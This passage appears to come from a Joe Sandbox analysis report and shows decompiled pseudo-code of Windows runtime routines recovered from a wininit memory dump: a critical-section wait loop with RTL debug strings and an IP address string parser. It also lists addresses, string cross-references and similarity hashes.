							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02573F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26020c0;
								if(_t85 != 0x26020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E025A217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02573F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x0254ec56
                                                0x0254ec56
                                                0x0254ec56
                                                0x0254ec5c
                                                0x0254ec64
                                                0x025823e6
                                                0x025823eb
                                                0x025823eb
                                                0x0254ec6a
                                                0x0254ec6c
                                                0x0254ec6f
                                                0x025823f3
                                                0x025823f8
                                                0x025823fa
                                                0x025823fc
                                                0x0254ec75
                                                0x0254ec76
                                                0x0254ec76
                                                0x0254ec7b
                                                0x0254ec7c
                                                0x0254ec7e
                                                0x02582406
                                                0x02582407
                                                0x0258240c
                                                0x0258240d
                                                0x0258240d
                                                0x0258240d
                                                0x02582414
                                                0x02582417
                                                0x0258241e
                                                0x02582435
                                                0x02582438
                                                0x0258243c
                                                0x0258243f
                                                0x02582442
                                                0x02582443
                                                0x02582446
                                                0x02582449
                                                0x02582453
                                                0x02582455
                                                0x0258245b
                                                0x0258245b
                                                0x0254eb99
                                                0x0254eb99
                                                0x0254eb9c
                                                0x0254eb9d
                                                0x0254eb9f
                                                0x0254eba2
                                                0x02582465
                                                0x0258246b
                                                0x0258246d
                                                0x0254eba8
                                                0x0254eba9
                                                0x0254eba9
                                                0x0254ebae
                                                0x0254ebb3
                                                0x0254ebb9
                                                0x0254ebbb
                                                0x02582513
                                                0x02582514
                                                0x02582519
                                                0x0258251b
                                                0x0254ec2a
                                                0x0254ec2d
                                                0x0254ec33
                                                0x0254ec36
                                                0x0254ec3a
                                                0x0254ec3e
                                                0x0254ec40
                                                0x0254ec47
                                                0x0254ec47
                                                0x0254ec40
                                                0x025222c6
                                                0x0254ebc1
                                                0x0254ebc1
                                                0x0254ebc5
                                                0x0254ec9a
                                                0x0254ec9a
                                                0x0254ebd6
                                                0x0254ebd6
                                                0x00000000
                                                0x0254ebbb
                                                0x02582477
                                                0x0258247c
                                                0x02582486
                                                0x0258248b
                                                0x02582496
                                                0x0258249b
                                                0x0258249d
                                                0x025824a0
                                                0x025824a3
                                                0x025824aa
                                                0x025824aa
                                                0x025824a5
                                                0x025824a5
                                                0x025824a5
                                                0x025824ac
                                                0x025824af
                                                0x025824b0
                                                0x025824b3
                                                0x025824b9
                                                0x025824ba
                                                0x025824bb
                                                0x025824c6
                                                0x025824cb
                                                0x025824cd
                                                0x025824d0
                                                0x025824d1
                                                0x025824d4
                                                0x025824d6
                                                0x025824d9
                                                0x025824d9
                                                0x025824dc
                                                0x025824df
                                                0x025824e1
                                                0x025824e7
                                                0x025824e9
                                                0x025824ec
                                                0x025824ef
                                                0x025824f2
                                                0x025824f2
                                                0x025824ef
                                                0x025824e7
                                                0x025824fa
                                                0x025824ff
                                                0x02582501
                                                0x02582503
                                                0x02582506
                                                0x0258250b
                                                0x0254eb8c
                                                0x0254eb93
                                                0x00000000
                                                0x00000000
                                                0x0254eb93
                                                0x00000000
                                                0x0254eb99
                                                0x0254ec85
                                                0x0254ec85
                                                0x0254ec85
                                                0x00000000

                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0258248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025824BD
                                                • RTL: Re-Waiting, xrefs: 025824FA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 1d87ac645c18cdeb04f26f4acf7c29ed5c40bd7626a2c5d68a4235235f30aa33
                                                • Instruction ID: 5c0cc0a8527a13f7d7747b01e0e16b5d38214663660c9abb7f14980bb9004a72
                                                • Opcode Fuzzy Hash: 1d87ac645c18cdeb04f26f4acf7c29ed5c40bd7626a2c5d68a4235235f30aa33
                                                • Instruction Fuzzy Hash: CC41F670600205BBD720EB64CC89F6A7BA9BF85724F208A05F955EB2D0D774E941CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0255FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0255FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0255EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0255EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0255685D(_t167, 4) == 0) {
								if(E0255685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0255685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0255685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02538980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0252DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0255EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0255EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                0x0255fcd1
                                                0x0255fcd6
                                                0x0255fcd9
                                                0x0255fcdc
                                                0x0255fcdf
                                                0x0255fce2
                                                0x0255fce5
                                                0x0255fce8
                                                0x0255fceb
                                                0x0255fced
                                                0x0255fced
                                                0x0255fcf3
                                                0x00000000
                                                0x00000000
                                                0x0255fcfc
                                                0x0255fcfe
                                                0x0255fdc1
                                                0x0258ecbd
                                                0x00000000
                                                0x0258eccc
                                                0x0258eccc
                                                0x0258ecd2
                                                0x00000000
                                                0x00000000
                                                0x0258ecdf
                                                0x0258ece0
                                                0x0258ece4
                                                0x0258eceb
                                                0x0258ecee
                                                0x0258eca8
                                                0x0258eca8
                                                0x0258ecaa
                                                0x0255fd76
                                                0x0255fd79
                                                0x0255fdb4
                                                0x0255fdb5
                                                0x0255fdb6
                                                0x00000000
                                                0x0255fdb6
                                                0x0255fd7e
                                                0x0258ecfc
                                                0x0255fe2f
                                                0x00000000
                                                0x0255fe2f
                                                0x0258ed08
                                                0x0258ed0f
                                                0x0258ed17
                                                0x0258ed1b
                                                0x00000000
                                                0x0258ed1b
                                                0x0255fd88
                                                0x00000000
                                                0x00000000
                                                0x0255fd94
                                                0x0255fd99
                                                0x0255fda1
                                                0x00000000
                                                0x00000000
                                                0x0255fdb0
                                                0x00000000
                                                0x0255fdb0
                                                0x0258ecbd
                                                0x0255fdc7
                                                0x0255fdcb
                                                0x00000000
                                                0x0255fdd7
                                                0x0255fde3
                                                0x0255fe06
                                                0x02571fe7
                                                0x00000000
                                                0x00000000
                                                0x02571fef
                                                0x02571ff0
                                                0x02571ff4
                                                0x02571ff7
                                                0x02571ffa
                                                0x02571ffd
                                                0x02572000
                                                0x00000000
                                                0x00000000
                                                0x0258ecf1
                                                0x00000000
                                                0x0258ecf1
                                                0x00000000
                                                0x0255fe06
                                                0x0255fde8
                                                0x0255fdec
                                                0x0255fdef
                                                0x0255fdf2
                                                0x00000000
                                                0x0255fdf2
                                                0x0255fdcb
                                                0x0255fd04
                                                0x0255fd05
                                                0x0258ec67
                                                0x00000000
                                                0x00000000
                                                0x0258ec6f
                                                0x00000000
                                                0x0258ec6f
                                                0x0255fd13
                                                0x0255fd3c
                                                0x0255fd40
                                                0x0258ec75
                                                0x0258ec7a
                                                0x00000000
                                                0x0258ec8a
                                                0x0258ec8a
                                                0x0258ec90
                                                0x0258ecb2
                                                0x0255fd73
                                                0x0255fd73
                                                0x00000000
                                                0x0255fd73
                                                0x0258ec95
                                                0x00000000
                                                0x00000000
                                                0x0258eca1
                                                0x0258eca4
                                                0x0258eca5
                                                0x00000000
                                                0x0258eca5
                                                0x0258ec7a
                                                0x0255fd4a
                                                0x00000000
                                                0x0255fd6e
                                                0x0255fd6e
                                                0x0255fd71
                                                0x00000000
                                                0x0255fd71
                                                0x0255fd4a
                                                0x0255fd21
                                                0x0256a3a1
                                                0x00000000
                                                0x0256a3a1
                                                0x0255fd36
                                                0x0257200b
                                                0x02572012
                                                0x00000000
                                                0x00000000
                                                0x02572018
                                                0x00000000
                                                0x02572018
                                                0x00000000
                                                0x0255fd36
                                                0x0255fe0f
                                                0x0255fe16
                                                0x0256a3ad
                                                0x00000000
                                                0x00000000
                                                0x0256a3b3
                                                0x0256a3b3
                                                0x0255fe1f
                                                0x0258ed25
                                                0x0258ed86
                                                0x00000000
                                                0x00000000
                                                0x0258ed91
                                                0x0258ed95
                                                0x0258ed95
                                                0x0258ed9a
                                                0x0258edad
                                                0x0258edb3
                                                0x0258edba
                                                0x0258edc4
                                                0x0258edc9
                                                0x00000000
                                                0x0258edcc
                                                0x0258ed2a
                                                0x0258ed55
                                                0x00000000
                                                0x00000000
                                                0x0258ed61
                                                0x0258ed66
                                                0x0258ed6e
                                                0x00000000
                                                0x00000000
                                                0x0258ed7d
                                                0x00000000
                                                0x0258ed7d
                                                0x0258ed30
                                                0x00000000
                                                0x00000000
                                                0x0258ed3c
                                                0x0258ed43
                                                0x0258ed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: e27198eef08e30e253ea7af0f815196201407a73395ac31f6307a5a6a2b3e13d
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: DF91BF31D0022AEBDF25DF98C8557AEBBB8FF82308F20846BD805B7551E7705A45CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%